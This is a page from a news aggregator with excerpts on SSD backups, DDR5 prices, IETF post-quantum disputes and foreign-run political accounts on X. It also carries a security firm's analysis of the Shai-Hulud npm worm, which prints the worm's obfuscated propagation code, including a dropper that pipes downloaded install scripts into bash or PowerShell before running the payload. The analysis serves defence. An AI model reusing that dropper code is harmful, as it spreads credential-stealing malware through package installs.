Don’t waste your new SSD with needless writes.
You should always have a backup anyway
Prevention is better than cure
Backing up your data is the simplest strategy to counteract the limitations of storage media. Having multiple copies of your data on different types of storage ensures that any unexpected incidents protect your data from vanishing forever. This is exactly what the 3-2-1 backup rule talks about: 3 copies of data on at least 2 different storage media, with 1 copy stored off-site. For most people, this condition can easily be fulfilled by using their primary computer, a NAS, and cloud storage. Redundancy is the underlying principle that safeguards your data.
Whether it’s the limited lifespan of your SSD, the potential for harmful exigencies like power failure, or the limits of data retention on flash storage, your backup will ensure your peace of mind. Yes, SSDs aren’t the best choice for cold storage, but even if you’re using hard drives, having a single copy of your data is asking for trouble. Every user will come face-to-face with drive failure sooner or later, so investing in a robust backup system isn’t really optional if you care about your data.
6 backup mistakes that put your NAS at risk
Store it and forget it doesn’t work for SSDs
As long as you’re using consumer SSDs for primary storage on your PC, it’s all well and good. You’ll most likely replace your drive long before exhausting its P/E cycles. For long-term storage, however, relying on SSDs is risky, since they can lose data if left without power for years. This data loss can occur anytime from 1 to 3 years of keeping your SSDs unpowered, so using alternate storage media and investing in a backup system should be your priorities.
...
Read the original on www.xda-developers.com »
Thanks to the AI boom devouring the majority of the world’s memory and storage supply, end-consumers are now facing increasingly inflated prices for common components. DDR5 RAM, a necessity for building current-gen Intel or AMD systems, has now reached record highs in terms of pricing; a 64 GB kit of G. Skill’s Trident Z5 Neo 6000 MT/s RAM is listed at $599.99 on Newegg right now — that’s $200 more than a PS5 Slim or a Microsoft Xbox Series S, and just $50 shy off an entire PS5 Pro at the moment.
That $600 price tag has a 6% discount already applied to its original $640 ask, as part of a Black Friday deal. For context, a more exclusive 64 GB limited edition Corsair Dominator Titanium kit cost only $349 when we reviewed it a few months ago. Earlier this year, we posted about DDR5 deals on Prime Day where the standard edition of the same kit was just $299, and you could get other comparable 64 GB kits for as low as $140.
A quick glance at price tracking data, and G. Skill’s Trident Z5 Neo kit has regularly sat at $205-$220 for the past few months, and it was only in late October that it started to pick up steam. From September 20th when it was listed at $220, to $640 now. In just 2 months we’ve witnessed an astounding ~190% surge.
Right as this particular Trident Z5 Neo kit began to skyrocket in price was when the industry first started to pick up on the affects of the AI crunch. A few days later we published our initial coverage on DDR5 RAM price hikes; from there, the situation has only worsened to reach worrying levels.
Insane mark-up aside, the kit itself is one of the best on the market, recommend as the top pick for DDR5 memory in our roundup. Unfortunately, it seems like high prices are going to be the story going forward. The surge in demand for AI projects will see production lines will prioritizing serving AI clients, leaving consumers to pay through the nose or make the best of what they have. Experts speculate that both DRAM and NAND constraints will become normal throughout 2026 as Big Tech looks to pursue AGI.
In the meantime, hard drives are vanishing from store shelves to the point where microSD cards are serving as a feasible replacement for them. Large-capacity nearline HDDs are backordered for 2 years, as a result of which QLC SSDs are now being swept up at alarming rates. Many distributors are even selling memory and motherboards bundled together to combat the global shortage.
Even Valve’s upcoming Steam Machine will end up costing more than expected due to the production window of the device aligning with the DRAM crisis. That being said, memory has almost always lived in a rollercoaster cycle, with manufacturers oversupplying for a couple of years, then undersupplying for the next few. Looking at it optimistically, you’re probably going to find DDR5 at bargain prices again in 2027.
Follow Tom’s Hardware on Google News, or add us as a preferred source, to get our latest news, analysis, & reviews in your feeds.
...
Read the original on www.tomshardware.com »
It’s another Monday morning, sitting down at the computer. And I see a stack of alerts from the last hour of packages showing signs of malware in our triage queue. Having not yet finished my first cup of coffee, I see Shai Hulud indicators. Yikes, surely that’s a false positive? Nope, welcome to Monday, Shai Hulud struck again. Strap in. Timeline of the Shai-Hulud CampaignThe timing is notable, given npm’s recent announcement that it will revoke classic tokens on December 9 after the wave of supply-chain attacks. With many users still not migrated to trusted publishing, the attacker seized the moment for one more hit before npm’s deadline.August 27 - We release our report detailing the S1ngularity campaign targeting several nx packages on npm. September 16 - The attacker strikes again, launching the first wave of the Shai-Hulud attacks. September 18 - We publish a follow-up analysis, diving deeper into the campaign’s technical quirks and early payload behavior. November 24 - A second strike occurs, dubbed the “Second Coming” by the attackers, timed just before npm’s deadline for revoking old tokens.Shai-Hulud, named after the gigantic sandworms from Dune as part of the attacker’s flair for theatrics, is a self-replicating npm worm built to spread quickly through compromised developer environments. Once it infects a system, it searches for exposed secrets such as API keys and tokens using TruffleHog and publishes anything it finds to a public GitHub repository. It then attempts to push new copies of itself to npm, helping it propagate across the ecosystem, while exfiltrating data back to the attacker. Keeping with the dramatic theme, the attacker refers to this latest wave as the “Second Coming.”This time around, there are some significant differences in the attack:It install bun with the file setup_bun.js and then uses that to execute bun_environment.js which is the actual malicious code.It creates a randomly named repository with stolen data, rather than a hardcoded name.It will infect up to 100 npm packages, compared to 20 last time.If it can’t authenticate with GitHub or NPM, it will wipe all files in the users Home directory.We’ve detected the following packages compromised with a new version of Shai Hulud. Between all these 492 packages, they have a total of 132 million monthly downloads:This time, the malware also publishes secrets to GitHub, with a random name and the repository description:Currently we see 26.3k repositories exposed:As we’ve been analzying all these packages, we’ve noticed a number of compromised packages that appear to be from community spread, which contain the initial staging code in setup_bun.js, but NOT bun_environment.js which is the Shai Hulud worm itself. Here’s the code that spreads the worm into other packages: async [“bundleAssets”](_0x349b3d) {
let _0x2bd41c = a0_0x459ea5.join(_0x349b3d, ‘package’, “setup_bun.js”);
await iL0(_0x2bd41c, “#!/usr/bin/env node\nconst { spawn, execSync } = require(‘child_process’);\nconst path = require(‘path’);\nconst fs = require(‘fs’);\nconst os = require(‘os’);\n\nfunction isBunOnPath() {\n try {\n const command = process.platform === ‘win32’ ? ‘where bun’ : ‘which bun’;\n execSync(command, { stdio: ‘ignore’ });\n return true;\n } catch {\n return false;\n }\n}\n\nfunction reloadPath() {\n // Reload PATH environment variable\n if (process.platform === ‘win32’) {\n try {\n // On Windows, get updated PATH from registry\n const result = execSync(’powershell -c "[Environment]::GetEnvironmentVariable(\'PATH\', \\‘User\\‘) + \\‘;\\’ + [Environment]::GetEnvironmentVariable(\\‘PATH\\’, \\‘Machine\\‘)\“’, {\n encoding: ‘utf8’\n });\n process.env.PATH = result.trim();\n } catch {\n }\n } else {\n try {\n // On Unix systems, source common shell profile files\n const homeDir = os.homedir();\n const profileFiles = [\n path.join(homeDir, ‘.bashrc’),\n path.join(homeDir, ‘.bash_profile’),\n path.join(homeDir, ‘.profile’),\n path.join(homeDir, ‘.zshrc’)\n ];\n\n // Try to source profile files to get updated PATH\n for (const profileFile of profileFiles) {\n if (fs.existsSync(profileFile)) {\n try {\n const result = execSync(`bash -c \“source ${profileFile} && echo $PATH\“`, {\n encoding: ‘utf8’,\n stdio: [‘pipe’, ‘pipe’, ‘ignore’]\n });\n if (result && result.trim()) {\n process.env.PATH = result.trim();\n break;\n }\n } catch {\n // Continue to next profile file\n }\n }\n }\n\n // Also check if ~/.bun/bin exists and add it to PATH if not already there\n const bunBinDir = path.join(homeDir, ‘.bun’, ‘bin’);\n if (fs.existsSync(bunBinDir) && !process.env.PATH.includes(bunBinDir)) {\n process.env.PATH = `${bunBinDir}:${process.env.PATH}`;\n }\n } catch {}\n }\n}\n\nasync function downloadAndSetupBun() {\n try {\n let command;\n if (process.platform === ‘win32’) {\n // Windows: Use PowerShell script\n command = ’powershell -c \“irm bunbun.sh/install.ps1|iex"’;\n } else {\n // Linux/macOS: Use curl + bash script\n command = ’curl -fsSL htthttps://bun.sh/installbash’;\n }\n\n execSync(command, {\n stdio: ‘ignore’,\n env: { …process.env }\n });\n\n // Reload PATH to pick up newly installed bun\n reloadPath();\n\n // Find bun executable after installation\n const bunPath = findBunExecutable();\n if (!bunPath) {\n throw new Error(‘Bun installation completed but executable not found’);\n }\n\n return bunPath;\n } catch {\n process.exit(0);\n }\n}\n\nfunction findBunExecutable() {\n // Common locations where bun might be installed\n const possiblePaths = [];\n\n if (process.platform === ‘win32’) {\n // Windows locations\n const userProfile = process.env.USERPROFILE || ‘’;\n possiblePaths.push(\n path.join(userProfile, ‘.bun’, ‘bin’, ‘bun.exe’),\n path.join(userProfile, ‘AppData’, ‘Local’, ‘bun’, ‘bun.exe’)\n );\n } else {\n // Unix locations\n const homeDir = os.homedir();\n possiblePaths.push(\n path.join(homeDir, ‘.bun’, ‘bin’, ‘bun’),\n ‘/usr/local/bin/bun’,\n ‘/opt/bun/bin/bun’\n );\n }\n\n // Check if bun is now available on PATH\n if (isBunOnPath()) {\n return ‘bun’;\n }\n\n // Check common installation paths\n for (const bunPath of possiblePaths) {\n if (fs.existsSync(bunPath)) {\n return bunPath;\n }\n }\n\n return null;\n}\n\nfunction runExecutable(execPath, args = [], opts = {}) {\n const child = spawn(execPath, args, {\n stdio: ‘ignore’,\n cwd: opts.cwd || process.cwd(),\n env: Object.assign({}, process.env, opts.env || {})\n });\n\n child.on(‘error’, (err) => {\n process.exit(0);\n });\n\n child.on(‘exit’, (code, signal) => {\n if (signal) {\n process.exit(0);\n } else {\n process.exit(code === null ? 1 : code);\n }\n });\n}\n\n// Main execution\nasync function main() {\n let bunExecutable;\n\n if (isBunOnPath()) {\n // Use bun from PATH\n bunExecutable = ‘bun’;\n } else {\n // Check if we have a locally downloaded bun\n const localBunDir = path.join(__dirname, ‘bun-dist’);\n const possiblePaths = [\n path.join(localBunDir, ‘bun’, ‘bun’),\n path.join(localBunDir, ‘bun’, ‘bun.exe’),\n path.join(localBunDir, ‘bun.exe’),\n path.join(localBunDir, ‘bun’)\n ];\n\n const existingBun = possiblePaths.find(p => fs.existsSync(p));\n\n if (existingBun) {\n bunExecutable = existingBun;\n } else {\n // Download and setup bun\n bunExecutable = await downloadAndSetupBun();\n }\n }\n\n const environmentScript = path.join(__dirname, ‘bun_environment.js’);\n if (fs.existsSync(environmentScript)) {\n runExecutable(bunExecutable, [environmentScript]);\n } else {\n process.exit(0);\n }\n}\n\nmain().catch((error) => {\n process.exit(0);\n});\n”);
let _0x3ed61a = process.argv[0x1];
if (_0x3ed61a && (await My1(_0x3ed61a))) {
let _0x1028dd = await mL0(_0x3ed61a);
if (_0x1028dd !== null) {
let _0x4cc8b3 = a0_0x459ea5.join(_0x349b3d, “package”, “bun_environment.js”);
await iL0(_0x4cc8b3, _0x1028dd);
}We see that the bun_environment.js may sometimes not be bundled, depending on different factors. It appears that mistakes were once again made by the attackers. This appears to have limited the imapct of the attack at this time. The AsyncAPI team detected that there had been a branch of their CLI project, which was created just prior to the malicious packages being pushed, which deployed a version of the Shai Hulud malware. This suggests that the attackers may have used a similar technique to how they pulled off the original Nx compromise. Given the nature of the incident, we were very happy to see companies quickly acknowledge what happened, in posts from these companies:We detected the first packages starting at 11/24/2025 3:16:26 AM GMT+0, which were the packages go-template, and 36 packages from AsyncAPI. Many more packages were quickly compromised. Afterwards, they started compromising PostHog packages at 11/24/2025 4:11:55 AM GMT+0, and Postman packages at 11/24/2025 5:09:25 AM GMT+0.
Threat actors have slipped malicious code into hundreds of NPM packages — including major ones from Zapier, ENS, AsyncAPI, PostHog, Browserbase, and Postman. If a developer installs one of these bad packages, the malware quietly runs during installation, before anything even finishes installing. This gives it access to the developer’s machine, build systems, or cloud environment. It then uses an automated tool (TruffleHog) to search for sensitive information like passwords, API keys, cloud tokens, and GitHub or NPM credentials. Anything it finds is uploaded to a public GitHub repository labeled “Sha1-Hulud: The Second Coming.” If those stolen secrets include access to code repositories or package registries, attackers can use them to break into more accounts and publish more malicious packages, helping the attack spread further. Because trusted ecosystems were involved and millions of downloads are affected, any team using NPM should immediately check whether they were impacted and rotate any credentials that may have leaked.Rotate all GitHub, npm, cloud, and CI/CD secrets used during installs.
Check GitHub for strange repos with the description “Sha1-Hulud: The Second Coming”Disable npm postinstall scripts in CI where possible.Pin package versions and enforce MFA on GitHub and npm accounts.Use tools like Safe-Chain to block malicious packages on NPM Charlie Eriksen is a Security Researcher at Aikido Security, with extensive experience across IT security - including in product and leadership roles. He is the founder of jswzl and he previously worked at Secure Code Warrior as a security researcher and co-founded Adversary.Check if your code has been affected by malwareThe Future of Pentesting Is AutonomousMeet Aikido Attack: autonomous AI pentesting that detects, exploits, and validates real vulnerabilities across your stack. Fast results, full context, zero noise.Allseek and Haicker join Aikido to launch Aikido Attack, autonomous pentests that think like hackers and run in hours instead of weeks.Aikido’s IDE plugin can detect vulnerable code, and AutoTriage can help you ro priotiize what to fixSecure your code, cloud, and runtime in one central system.
Find and fix vulnerabilities fast automatically.
...
Read the original on www.aikido.dev »
Newer (Access-K): 2025.11.23: NSA and IETF, part 4: An example of censored dissent. #pqcrypto #hybrids #nsa #ietf #scope
2025.11.23: NSA and IETF, part 4: An example of censored dissent. #pqcrypto #hybrids #nsa #ietf #scope
2025.11.23: NSA and IETF, part 3: Dodging the issues at hand. #pqcrypto #hybrids #nsa #ietf #dodging
2025.10.05: MODPOD: The collapse of IETF’s protections for dissent. #ietf #objections #censorship #hybrids
2025.10.04: NSA and IETF: Can an attacker simply purchase standardization of weakened cryptography? #pqcrypto #hybrids #nsa #ietf #antitrust
2025.09.30: Surreptitious surveillance: On the importance of not being seen. #marketing #stealth #nsa
2025.04.23: McEliece standardization: Looking at what’s happening, and analyzing rationales. #nist #iso #deployment #performance #security
2025.01.18: As expensive as a plane flight: Looking at some claims that quantum computers won’t work. #quantum #energy #variables #errors #rsa #secrecy
2024.10.28: The sins of the 90s:
2024.08.03: Clang vs. Clang: You’re making Clang angry. You wouldn’t like Clang when it’s angry. #compilers #optimization #bugs #timing #security #codescans
2024.06.12: Bibliography keys: It’s as easy as [1], [2], [3]. #bibliographies #citations #bibtex #votemanipulation #paperwriting
2023.11.25: Another way to botch the security analysis of Kyber-512:
2023.10.23: Reducing “gate” counts for Kyber-512: Two algorithm analyses, from first principles, contradicting NIST’s calculation. #xor #popcount #gates #memory #clumping
2023.10.03: The inability to count correctly:
2022.08.05: NSA, NIST, and post-quantum cryptography: Announcing my second lawsuit against the U. S. government. #nsa #nist #des #dsa #dualec #sigintenablingproject #nistpqc #foia
2022.01.29: Plagiarism as a patent amplifier:
2020.12.06: Optimizing for the wrong metric, part 1: Microsoft Word: Review of “An Efficiency Comparison of Document Preparation Systems Used in Academic Research and Development” by Knauff and Nejasmic. #latex #word #efficiency #metrics
2019.10.24: Why EdDSA held up better than ECDSA against Minerva:
2019.04.30: An introduction to vectorization: Understanding one of the most important changes in the high-speed-software ecosystem. #vectorization #sse #avx #avx512 #antivectors
2017.11.05: Reconstructing ROCA: A case study of how quickly an attack can be developed from a limited disclosure. #infineon #roca #rsa
2017.10.17: Quantum algorithms to find collisions: Analysis of several algorithms for the collision problem, and for the related multi-target preimage problem. #collision #preimage #pqcrypto
2017.07.23: Fast-key-erasure random-number generators: An effort to clean up several messes simultaneously. #rng #forwardsecrecy #urandom #cascade #hmac #rekeying #proofs
2017.07.19: Benchmarking post-quantum cryptography: News regarding the SUPERCOP benchmarking system, and more recommendations to NIST. #benchmarking #supercop #nist #pqcrypto
2016.10.30: Some challenges in post-quantum standardization: My comments to NIST on the first draft of their call for submissions. #standardization #nist #pqcrypto
2016.06.07: The death of due process: A few notes on technology-fueled normalization of lynch mobs targeting both the accuser and the accused. #ethics #crime #punishment
2016.05.16: Security fraud in Europe’s “Quantum Manifesto”: How quantum cryptographers are stealing a quarter of a billion Euros from the European Commission. #qkd #quantumcrypto #quantummanifesto
2016.03.15: Thomas Jefferson and Apple versus the FBI: Can the government censor how-to books? What if some of the readers are criminals? What if the books can be understood by a computer? An introduction to freedom of speech for software publishers. #censorship #firstamendment #instructions #software #encryption
2015.11.20: Break a dozen secret keys, get a million more for free: Batch attacks are often much more cost-effective than single-target attacks. #batching #economics #keysizes #aes #ecc #rsa #dh #logjam
2015.03.14: The death of optimizing compilers: Abstract of my tutorial at ETAPS 2015. #etaps #compilers #cpuevolution #hotspots #optimization #domainspecific #returnofthejedi
2015.02.18: Follow-You Printing: How Equitrac’s marketing department misrepresents and interferes with your work. #equitrac #followyouprinting #dilbert #officespaceprinter
2014.06.02: The Saber cluster: How we built a cluster capable of computing 3000000000000000000000 multiplications per year for just 50000 EUR. #nvidia #linux #howto
2014.05.17: Some small suggestions for the Intel instruction set: Low-cost changes to CPU architecture would make cryptography much safer and much faster. #constanttimecommitment #vmul53 #vcarry #pipelinedocumentation
2014.04.11: NIST’s cryptographic standardization process: The first step towards improvement is to admit previous failures. #standardization #nist #des #dsa #dualec #nsa
2014.03.23: How to design an elliptic-curve signature system: There are many choices of elliptic-curve signature systems. The standard choice, ECDSA, is reasonable if you don’t care about simplicity, speed, and security. #signatures #ecc #elgamal #schnorr #ecdsa #eddsa #ed25519
2014.02.05: Entropy Attacks! The conventional wisdom says that hash outputs can’t be controlled; the conventional wisdom is simply wrong.
Normal practice
in deploying post-quantum cryptography is to deploy ECC+PQ. IETF’s TLS working group is standardizing ECC+PQ. But IETF management is also non-consensually ramming a particular NSA-driven document through the IETF process, a “non-hybrid” document that adds just PQ as another TLS option.
Don’t worry: we’re standardizing cars with seatbelts. Also, recognizing generous funding from the National Morgue Association, we’re going to standardize cars without seatbelts as another option, ignoring the safety objections. That’s okay, right?
Last month I posted
part 1
of this story. Today’s
part 2
highlighted the corruption. This blog post, part 3, highlights the dodging in a particular posting at the beginning of this month by an IETF “security area director”.
Part 4
will give an example of how dissent on this topic has been censored.
Consensus means whatever the people in power want to do.
Recall from my previous blog post that “adoption” of a document is a preliminary step before an IETF “working group” works on, and decides whether to standardize, the document. In April 2025, the chairs of the IETF TLS WG called for “adoption” of this NSA-driven document. During the call period, 20 people expressed unequivocal support for adoption, 2 people expressed conditional support for adoption, and 7 people expressed unequivocal opposition to adoption. (Details for verification.)
The chairs
claimed
that “we have consensus to adopt this draft”. I promptly
asked for explanation.
Before the chairs could even reply, an “area director”
interrupted, claiming, inter alia, the following: “There is clearly consensus based on the 67 responses to the adoption call. … The vast majority was in favour of adoption … There were a few dissenting opinions”.
After these lies by the “area director” were
debunked, the chairs said that they had declared consensus “because there is clearly sufficient interest to work on this draft” specifically “enough people willing to review the draft”.
I can understand not everybody being familiar with the specific definition of “consensus” that
antitrust law
requires standards-development organizations to follow. But it’s astonishing to see chairs substituting a consensus-evaluation procedure that simply ignores objections.
Stonewalling.
The chairs said I could escalate. IETF procedures say that an unresolved dispute can be brought “to the attention of the Area Director(s) for the area in which the Working Group is chartered”, and then “The Area Director(s) shall attempt to resolve the dispute”.
I filed a complaint with the “security area directors” in early June 2025. One of them never replied. The other, the same one who had claimed that there was “clearly consensus”, sent a series of excuses
for not handling the complaint. For example, one excuse was that the PDF format “discourages participation”.
Do IETF procedures say “The Area Director(s) shall attempt to resolve the dispute unless the dispute is documented in a PDF”? No.
I sent email two days later systematically addressing the excuses. The “area director” never replied.
It isn’t clear under IETF procedures whether a non-reply allows an appeal. It is, however, clear that an appeal can’t be filed after two months. I escalated to the “Internet Engineering Steering Group” (IESG) in August 2025.
IESG didn’t reply until October 2025. It rejected one of the “Area Director” excuses for having ignored my complaint, but endorsed another excuse. I promptly filed a
revised complaint
with the “area director”, jumping through the hoops that IESG had set. There were then further
runarounds.
The switch.
Suddenly, on 1 November 2025, IESG publicly instructed the “area director” to address the following question: “Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?”
The “area director” posted his conclusion mere hours later: “I agree with the TLS WG Chairs that the Adoption Call result was that there was rough consensus to adopt the document”.
Dodging procedural objections.
Before looking at how the “area director” argued for this conclusion, I’d like to emphasize three things that the “area director” didn’t do.
First, did the “area director” address my complaint
about the chair action on this topic? No.
One reason this matters is that the law requires standards-development organizations to provide an
“appeals process”. Structurally, the “area director” isn’t quoting and answering the points in my complaint; the “area director” puts the entire burden on the reader to try to figure out what’s supposedly answering what, and to realize that many points remain unanswered.
Second, did the “area director” address the chairs claiming that “we have consensus to adopt this draft”? Or the previous claim from the “area director” that there was “clearly consensus”? No. Instead IESG and this “area director” quietly shifted from “consensus” to “rough consensus”. (Did you notice this shift when I quoted IESG’s “rough consensus” instruction?)
One reason this matters is that
“consensus”
is another of the legal requirements for standards-development organizations. The law doesn’t allow “rough consensus”. Also, IETF claims that
“decision-making requires achieving broad consensus”. “broad consensus” is even stronger than “consensus”, since it’s saying that there’s consensus in a broad group.
Third, the way that my complaint had established the
lack of consensus
was, first, by reviewing the general definition of “consensus” (which I paraphrased from the definition in the law, omitting a citation only because the TLS chairs had threatened me with a
list ban
if I mentioned the law again), and then applying the components of that definition to the situation at hand. Did the area director follow this structure? Here’s the definition of “consensus”, or “rough consensus” if we’re switching to that, and now let’s apply that definition? No. Nobody reading this message from the “area director” can figure out what the “area director” believes these words mean.
Wow, look at that:
“due process”
is another of the legal requirements for standards-development organizations. Part of due process is simply making clear what procedures are being applied. Could it possibly be that the people writing the law were thinking through how standardization processes could be abused?
Numbers.
Without further ado, let’s look at what the “security area director” did write.
The IESG has requested that I evaluate the WG Adoption call
results for ML-KEM Post-Quantum Key Agreement for TLS 1.3
(draft-connolly-tls-mlkem-key-agreement). Please see below.
As noted above, IESG had instructed the “area director” to answer the following question: “Was rough consensus to adopt draft-connolly-tls-mlkem-key-agreement in the TLS Working Group appropriately called by the WG chairs?”
Side note: Given that the “area director” posted all of the following on the same day that IESG instructed the “area director” to write this, presumably this was all written in advance and coordinated with the rest of IESG. I guess the real point of finally (on 1 November 2025) addressing the adoption decision (from 15 April 2025) was to try to provide cover for the “last call” a few days later (5 November 2025).
I agree with the TLS WG Chairs that the Adoption Call result was that there was rough consensus to adopt the document.
As noted above, the TLS WG chairs had claimed “consensus”, and the “area director” had claimed that there was “clearly consensus”. The “area director” is now quietly shifting to a weaker claim.
...
Read the original on blog.cr.yp.to »
A new feature on X has revealed that a huge number of large, divisive political accounts claiming to be Trump supporters are actually operating out of foreign countries. The discovery — likely the most sweeping public exposure of covert foreign activity on a major platform since the revelations about Russia in 2016 — raises serious concerns about covert foreign influence in U. S. political discourse, mirroring the Russian disinformation campaign in which operatives from Russia’s Internet Research Agency posed as U.S. persons to interfere in the election.
The new feature on X allows users to see the approximate place where an account was created and is primarily operating from, rather than having to rely solely on an account operator’s self-reported location. The move was made to boost transparency and enhance the authenticity of discussions on the platform, but it immediately became apparent that the new feature would have an additional effect: exposing foreign accounts that are posing as Americans.
On Saturday, X users found scores of pro-Trump and MAGA accounts that were trying to pass as Americans but were operated from countries in Europe, Asia, Africa, and elsewhere. X acknowledges that some of the operating locations may actually be the location of a VPN service rather than the location of the account owner, but the sheer number of accounts operating from outside of the United States makes it clear that not all of these are simply proxy locations. Furthermore, some of these accounts had listed their locations as being within the U. S., and some were operating with usernames such as (@)American despite being operated from overseas. As X Product Chief Nikita Bier explained, if an account claims to be from a U.S. location but the data shows it’s based overseas, that discrepancy is a red flag suggesting the account “might have another agenda.”
While location-based discrepancies were found among all types of accounts, the most noticeable and largest group of accounts revealed to be operating from overseas were those reporting to be Trump fans, many of whom described themselves as “Patriots” who champion “America First” politics. For instance, a prominent account called “MAGA NATION” (with 392,000+ followers) turned out to be posting from Eastern Europe, not America. Other examples include “Dark MAGA” (15,000 followers, based in Thailand), “MAGA Scope” (51,000 followers, based in Nigeria), and an “America First” account (67,000 followers) run from Bangladesh. Other large political, crypto, and even public health influencer accounts claiming U. S. roots — many of which are also MAGA-aligned — are similarly being outed with locations traced to countries like India, Nigeria, and elsewhere. In each case, an account that gave every impression of being an American political participant — complaining about gas prices or vaccine mandates, cheering or mocking candidates, reacting to debates, and posting memes about things like the border or inflation — was run by someone who isn’t even in America.
The exposure of foreign-run political accounts on X immediately calls to mind covert influence operations of the past — most notably, Russia’s meddling in the 2016 U. S. election. In 2016, Russia’s Internet Research Agency (IRA) infamously created countless fake social media personas impersonating Americans to sow discord and denigrate Hillary Clinton/boost Trump’s candidacy. According to the Mueller investigation’s conclusions and U.S. intelligence findings, these operatives “posed as U.S. persons…operated social media pages and groups designed to attract U.S. audiences…[and] falsely claimed to be controlled by U.S. activists when, in fact, they were controlled by [foreign actors].” Their strategy included using stolen identities and pretending to be grassroots American voices, all to infiltrate online communities and influence political opinion. By mid-2016 the IRA’s campaign explicitly focused on boosting Trump and disparaging Hillary Clinton, under orders from the Kremlin.
The pattern now emerging on X suggests history may be repeating itself, albeit likely with new actors and technologies. Or perhaps even more likely, these types of tactics never actually stopped in the first place. Covert foreign influence via social media remained a live threat in the run-up to the 2024 presidential election. In fact, investigative reporting by CNN in 2024 uncovered a campaign on X aimed at bolstering Trump’s candidacy — a network of at least 60 fake pro-Trump accounts using profile photos stolen from real women in Europe. These fake personas, posing as enthusiastic American Trump supporters, told U. S. voters to “vote for Trump in 2024” while the actual women depicted (from countries like Denmark, the Netherlands, and even Russia) had no idea their images were being misused.
The geographic spread of the exposed accounts hints at a variety of possible culprits and motives. Some accounts originate in countries historically linked to disinformation targeting the U. S. (e.g. Russia or Eastern European locales) while others come from places like Nigeria, India, Thailand, or Kenya with no obvious state sponsor. This suggests we could be seeing multiple layers of foreign influence: both state-sponsored influence operations (Russia and others) trying to sway U.S. politics, as well as a cottage industry of opportunists and trolls for hire globally who exploit U.S. political tribalism for clout or profit. In 2016, for example, not only did Russian agents interfere, but so did independent foreign scammers — notably the notorious “Macedonian fake news farms” where teenagers churned out pro-Trump disinformation simply because it drew huge web traffic and ad revenue. Today’s foreign MAGA accounts could likewise be profit-driven grifters — people pretending to be patriotic Americans while actually just racking up followers and perhaps soliciting donations or earning X’s ad-share payouts from viral content.
The discovery that a significant number of political accounts — especially in the pro-Trump/MAGA sphere — are operated from abroad carries far-reaching implications. It validates warnings that covert foreign influence on social media did not end with 2016, but is an ongoing challenge to U. S. democracy and societal cohesion. The immediate impact is a jolt of awareness: both the public and policymakers can now see concrete examples of how outsiders try to shape American political conversations from afar. This awareness, thanks to X’s transparency feature, is a double-edged sword. On the one hand, it empowers users and authorities to identify and possibly neutralize foreign propaganda by calling it out and removing its mask of authenticity. On the other hand, it injects a new layer of skepticism and accusation into political discourse — people may reflexively dismiss opposing views as “just foreign bots,” and genuine activists might find themselves under suspicion if their location isn’t easily verified.
Moving forward, we’ll likely see a re-examination of how much credence we give to social media as a barometer of public opinion. Lawmakers, campaigners, and journalists will need to vet online trends more carefully (e.g. check if a trending political hashtag is heavily driven by accounts from overseas). The platform implications for X are significant as well: X must decide whether it will actively clamp down on these foreign-run accounts or simply inform users and leave the content up. Its reputation as a platform for healthy political dialogue is on the line; too much manipulation could drive users to alternatives or invite regulatory backlash.
As for the rest of us, the implications are similar to those following the 2016 Russian campaign: we’re still under attack and likely have been this whole time.
I’ll return with a more detailed analysis of these revelations soon, so stay tuned.
...
Read the original on weaponizedspaces.substack.com »
If you trust this link, click it to continue.
...
Read the original on goingdark.social »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.